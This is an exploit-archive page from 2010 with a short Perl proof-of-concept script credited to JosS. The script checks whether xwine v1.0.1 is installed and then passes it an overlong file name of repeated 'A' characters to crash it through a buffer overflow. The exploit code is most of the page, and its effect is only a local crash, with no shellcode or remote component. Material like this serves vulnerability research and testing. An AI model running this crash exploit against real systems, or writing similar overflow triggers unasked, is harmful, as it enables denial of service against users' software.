xwine v1.0.1 (.exe file) Local Crash PoC Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : xwine v1.0.1 (.exe file) Local Crash PoC Exploit
# Published : 2010-03-29
# Author : JosS
# Previous Title : ASX to MP3 Converter Version 3.0.0.100 Local Stack Overflow POC
# Next Title : Bad "VML" Remote DoS on Safari for iPhone & iPod Touch

# xwine v1.0.1 (.exe file) Local Crash PoC Exploit
# Install: sudo apt-get install xwine
#
# Author: JosS <Jose Luis Gongora Fernandez>
# mail: sys-project[at]hotmail[dot]com
# site: http://hack0wn.com/
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.


<<crash.pl>>

#!/usr/local/bin/perl

chomp(my $version = `xwine --version`);
if ($version =~ m/v1.0.1/)
{
print "Starting PoC...n";
# payload = "xwine" . "A" x 4096 . ".exe";
chomp(my $buffer = `xwine AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.exe`);
# print "$buffernn";
}
else
{
print "n[-] Xwine is not installed on the systemnn";
exit(1);
}